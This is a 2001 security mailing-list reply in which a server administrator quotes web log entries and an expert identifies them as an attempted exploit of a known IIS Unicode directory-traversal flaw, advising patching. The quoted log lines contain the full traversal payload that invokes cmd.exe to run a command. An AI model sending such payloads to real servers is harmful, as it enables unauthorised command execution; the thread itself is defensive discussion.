Re: [cobalt-security] Odd log code, Hack attempt?

[Paul Gillingwater <paul@xxxxxxxxxxx>]

Quoting Rodrigo Velasco <rvelasco@xxxxxxx>:

> Hi again,
> 
> I've found the following lines in my last log from my Cobalt4i, I don't
> really know if it means something important, but looks to me how
> somebody
> was trying to use a sort of script on my server:
> 
> ns.mydomain.com 207.175.129.160 - - [07/Apr/2001:06:50:01 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
> nnt/system32/cmd.exe?/c%20dir HTTP/1.0" 302 308 "-" "-"
> ns2.mydomain.com 207.175.129.160 - - [07/Apr/2001:06:50:01 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
> nnt/system32/cmd.exe?/c%20dir HTTP/1.0" 302 308 "-" "-"
> www.customer.com 207.175.129.160 - - [07/Apr/2001:06:50:01 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
> nnt/system32/cmd.exe?/c%20dir HTTP/1.0" 302 310 "-" "-"

> I'll appreciate if anybody of you could tell me what does it mean and
> what
> could I do to avoid risk my server.

This is an attempt to exploit a standard known vulnerability on Windows IIS 
servers.  Some script kiddie is trying to crack your box, but is too stupid to 
know the difference between IIS and Apache.

As long as you keep up with the security patches, you should be fine.  And of 
course, running Linux is a good way to avoid Windows NT attacks.  :-)

*********************************
        Paul Gillingwater
        Managing Director
 CSO Lanifex Unternehmensberatung 
 & Softwareentwicklung G.m.b.H.
      NEW BUSINESS CONCEPTS

E-mail:  paul@xxxxxxxxxxx
Mobile:  +43/699/1922 3085
Webhome: http://www.lanifex.com
Address: Praterstrasse 60/1/2 
         A-1020 Vienna, Austria
*********************************